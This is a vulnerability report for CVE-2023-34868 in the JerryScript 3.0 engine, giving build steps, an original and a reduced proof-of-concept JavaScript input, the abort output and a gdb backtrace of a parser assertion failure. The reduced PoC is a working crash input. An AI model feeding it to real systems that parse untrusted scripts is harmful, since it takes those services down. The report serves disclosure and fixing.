Headline
CVE-2023-34868: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start) · Issue #5083 · jerryscript-project/jerryscript
JerryScript 3.0 (commit 05dbbd1) contains an assertion failure in parser_parse_for_statement_start (jerry-core/parser/js/js-parser-statm.c:1502). The backtrace below shows it is reached from jerry_parse, i.e. at parse time, before any statement of the supplied script executes. With assertions enabled (this report uses a --debug build) the engine goes through jerry_fatal/jerry_port_fatal with JERRY_FATAL_FAILED_ASSERTION and aborts, so an embedding that parses untrusted scripts can be taken down with a single input. Only the assertion-enabled behaviour is shown here; what a build without this assertion does past that point is not established by this report.
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
// Original (unreduced) test case for the assertion in parser_parse_for_statement_start.
// The abort happens inside jerry_parse (see the backtrace), so nothing in this script
// runs; only its token sequence matters. The reduced poc.js below shows that the
// `var c = class extends c { static { } ; } ;` expression followed by a `for` statement
// is sufficient, so the indexOf/push loops and the `8 * t , f . length` expression
// statement in front of it appear to be fuzzer residue (NOTE(review): inferred from the
// reduction, not confirmed against the parser code).
var r = { } ; var t = [ r , r , r , r , r , r , r , r , r , r , r , r , r , r , r ] ; var a = [ ] ; const e = 8 ; for ( var n = 0 ; n < 8 ; ++ n ) { for ( var o = 0 ; o < t . length ; ++ o ) { a . push ( String . prototype . indexOf . call ( t [ n ] , " object " ) ) ; } } a [ 8 ] = a = [ ] ; 8 * t , f . length ; var c = class extends c { static { } ; } ; for ( var n = 0 ; n < a . length ; ++ n ) { var f = { } , t = f ; r = 0 ; r += a [ n ] ; 1 ; }
// poc.js
// Reduced reproducer: a class expression carrying an empty `static { }` block, immediately
// followed by a `for` statement, is enough to hit the assertion at js-parser-statm.c:1502.
// `a` and `r` are never declared here; that is irrelevant because the engine aborts inside
// jerry_parse (see the backtrace) before the script would execute.
// NOTE(review): in the report both statements were collapsed onto the `// poc.js` line,
// which made the entire PoC a comment; they are restored onto their own lines here.
var c = class extends c { static { } ; } ;
for ( var n = 0 ; n < a . length ; ++ n ) { r += a [ n ] ; }
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start):1502.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Backtrace
(gdb) bt
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at ./jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x8479a60 <str> "context_p->token.type != LEXER_RIGHT_PAREN",
file=0x84789e0 <str> "./jerryscript/jerry-core/parser/js/js-parser-statm.c",
function=0x8479b20 <__func__.parser_parse_for_statement_start> "parser_parse_for_statement_start", line=1502)
at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x083d5567 in parser_parse_for_statement_start (context_p=<optimized out>)
at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:1502
#7 parser_parse_statements (context_p=<optimized out>)
at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:2851
#8 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
at ./jerryscript/jerry-core/parser/js/js-parser.c:2280
#9 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100)
at ./jerryscript/jerry-core/parser/js/js-parser.c:3326
#10 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0)
at ./jerryscript/jerry-core/api/jerryscript.c:412
#11 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
at ./jerryscript/jerry-core/api/jerryscript.c:480
#12 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>)
at ./jerryscript/jerry-ext/util/sources.c:52
#13 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5da "poc.js")
at ./jerryscript/jerry-ext/util/sources.c:63
#14 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
at ./jerryscript/jerry-main/main-desktop.c:156
(gdb)
Credits: @Ye0nny, @EJueon of the seclab-yonsei.